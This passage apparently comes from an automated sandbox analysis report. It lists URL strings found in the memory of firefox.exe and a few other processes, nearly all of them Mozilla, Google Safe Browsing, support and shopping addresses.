Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000034.00000002.2926960032.000001EB35639000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2796421015.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2792752744.000001EB35633000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000034.00000002.2926960032.000001EB35639000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2796421015.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2792752744.000001EB35633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916350174.000001EB31B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comto-handle-default-browser-agent
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2963602113.000001EB3DA9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000034.00000002.2914139986.000001EB316A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2928082132.000001EB35803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790868435.000001EB35A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/google-safeframe.html
Source: firefox.exe, 00000034.00000002.2940056297.000001EB36FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000034.00000002.2977449746.000001EB40EBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB36436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2972531378.000001EB4011F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851324962.000001EB3DC7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851324962.000001EB3DC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB36436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2963602113.000001EB3DA53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userpreffedRegionsBlockString
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userpreffedRegionsBlockStringDISCOVERY_STREAM_CONFIG_RESETDISCOVERY_STRE
Source: firefox.exe, 00000034.00000002.2942571768.000001EB3786C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2937567313.000001EB36CBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB3760B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsresource://gre/modules/PrivateBrowsingUtils.sys.mjs
Source: firefox.exe, 00000034.00000002.2942571768.000001EB3786C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2937567313.000001EB36CBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2942571768.000001EB37813000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB3760B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37608000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851918874.000001EB369AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelresource://gre/modules/GeckoViewWebExtension.sys
Source: 847ee125a0.exe, 00000024.00000003.2629146400.000000000554E000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2790959580.000000000570E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 00000034.00000002.2914139986.000001EB316A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E0FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2925034988.000001EB33D3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000034.00000002.2948502881.000001EB381EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2937567313.000001EB36C71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851482973.000001EB381EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000034.00000002.2937567313.000001EB36CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 00000034.00000002.2978712541.000001EB40FC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000034.00000002.2952134810.000001EB387BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeschrome://browser/content/mi
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationchrome://browser/locale/downloads/downloads.proper
Source: 847ee125a0.exe, 00000027.00000003.2848165418.00000000057DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.orgbrowser.tabs.drawInTitlebarcreateContentPrincipalFromOrigin_migrateXULSto
Source: 847ee125a0.exe, 00000024.00000003.2629146400.000000000554C000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2651809533.0000000005545000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2629228306.0000000005545000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2791123743.0000000005705000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2817235884.0000000005705000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2790959580.000000000570C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 847ee125a0.exe, 00000024.00000003.2629228306.0000000005520000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2791123743.00000000056E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 847ee125a0.exe, 00000024.00000003.2629146400.000000000554C000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2651809533.0000000005545000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2629228306.0000000005545000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2791123743.0000000005705000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2817235884.0000000005705000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2790959580.000000000570C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 847ee125a0.exe, 00000024.00000003.2629228306.0000000005520000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2791123743.00000000056E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000034.00000002.2914139986.000001EB316A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2927413392.000001EB35729000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000034.00000002.2981779926.000018DAC0004000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2968787675.000001EB3DF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2965979540.000001EB3DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2968787675.000001EB3DF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E043000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37684000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790868435.000001EB35A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000034.00000002.2932523071.000001EB36457000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2968787675.000001EB3DF17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
